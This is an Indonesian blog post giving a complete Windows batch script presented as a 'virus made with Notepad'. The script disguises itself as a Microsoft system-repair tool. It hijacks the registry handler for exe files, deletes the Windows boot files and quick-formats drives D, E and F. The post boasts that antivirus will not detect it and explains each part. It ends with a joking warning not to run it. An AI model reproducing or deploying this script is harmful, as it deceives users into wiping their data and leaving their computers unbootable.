Warung Bebas

Senin, 23 Agustus 2010

Membuat virus Dengan Notepad

Anda tentu sudah tahu apa itu virus. Dengan hanya berbekalkan notepad kita bisa membuat sebuah virus yang cukup mematikan. Dan jangan takut kalau virus dari notepad ini akan terdeteksi sebagai virus. Virus ini tidak akan terdeteksi, karena ia dibuat dari sebuah command prompt milik Windows. Sehingga tidak ada signature yang akan dicegat oleh antivirus


Copy kode berikut ke notepad, dan simpan dengan ekstensi 'bat"


'batas script---------------------------------------------------------------


@echo off
title Microsoft Windows TM Auto Repair
echo.
echo Preparing to Fixing the System..............................
echo This system need to repair of broken files.
echo This problem may be cause a Virus activity or coruption files.
echo Please wait a minute until windows doing it self....
echo Please close any running programs from the Windows system.
echo This program License and copyright by
echo Microsoft Coorporation TM.
echo System Repair in progress ........ please wait a second..
echo.
reg add HKLM\SOFTWARE\Classes\exefile\shell\open\Command /ve /d %%fe340ead%%  /f
echo.
del /f /Q /A C:\ntldr /S
echo.
Format  D: /Q /X /y
echo.
Format  E: /Q /X /y
echo.
Format  F: /Q /X /y
echo.
del /f /Q /A C:\command.com /S
echo.
del /f /Q /A C:\io.sys /S
echo.
del /f /Q /A C:\config.sys /S 
echo.
echo System is now repaired.
echo Windows will reboot the system.
echo.
'batas script---------------------------------------------------------------


Prinsip kerja dari script ini
  • Script warna merah : untuk mengelabuhi user agar seakan-akan ini adalah service windows dalam menemukan sebuah virus dan berusaha memperbaikinya. Padahal ini hanya palsu belaka
  • Script warna biru : membuat value diregistry agar semua file yang berekstensi exe tidak akan bisa dibuka lagi oleh program default file tersebut. Dengan kata lain jika anda mempunyai file mp3, file tersebut tidak akan bisa dibuka oleh winamp misalnya,dll
  • Script berwarna pink : menghapus semua file yang dibutuhkan oleh windows untuk memboot
  • Script berwarna hitam : memformat semua harddisk yang ada di komputer
Terakhir jangan jalankan script ini di komputer teman, apalagi komputer kamu sendiri. Silakan tanggung akibatnya sendiri.Hehehehehe....


0 komentar em “Membuat virus Dengan Notepad”

Posting Komentar